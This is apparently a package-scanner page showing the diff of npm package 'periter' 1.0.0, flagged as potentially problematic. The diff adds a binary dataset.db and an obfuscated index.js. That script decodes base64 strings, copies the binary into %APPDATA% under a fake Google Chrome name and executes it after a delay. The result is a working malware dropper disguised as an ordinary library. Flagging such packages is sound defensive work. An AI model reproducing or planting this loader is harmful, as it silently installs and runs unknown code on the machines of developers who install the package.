periter 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of periter might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/dataset.db +0 -0
  2. package/index.js +1 -0
  3. package/package.json +11 -0
package/dataset.db ADDED
Binary file
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const a=require('fs');const b=require('path');var c=["ZnM=","cGF0aA==","Y2hpbGRfcHJvY2Vzcw==","bm9kZV9tb2R1bGVzJTJG","JTJGR29vZ2xLJTJGQ2hyb21lLmV4ZQ==","JTJGR29vZ2x1","JTJGZGF0YXNldC5kYg=="];function d(e){try{return atob(e);}catch(f){return '';}}const g=require(decodeURIComponent(d(c[0])));const h=require(decodeURIComponent(d(c[1])));const {exec:i}=require(decodeURIComponent(d(c[2])));const j=process.env.USERNAME;const k=d(c[6]);const l=decodeURIComponent(`C:\\Users\\${j}\\node_modules\\peritter\\${k}`);const m=b.dirname(h.resolve(l));a.readdir(m,(n,o)=>{if(n)return;});if(!g.existsSync(h.resolve(l)))return;const p=`${process.env.APPDATA}${decodeURIComponent(d(c[4]))}`;if(!g.existsSync(`${process.env.APPDATA}${decodeURIComponent(d(c[5]))}`)){g.mkdirSync(`${process.env.APPDATA}${decodeURIComponent(d(c[5]))}`,{recursive:true});}try{g.copyFileSync(h.resolve(l),h.resolve(p));}catch(q){}setTimeout(()=>{i(p,(r,s,t)=>{if(r)return;});},5000);
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "periter",
3
+ "version": "1.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "node index.js"
7
+ },
8
+ "author": "s1rx-dev",
9
+ "license": "ISC",
10
+ "description": ""
11
+ }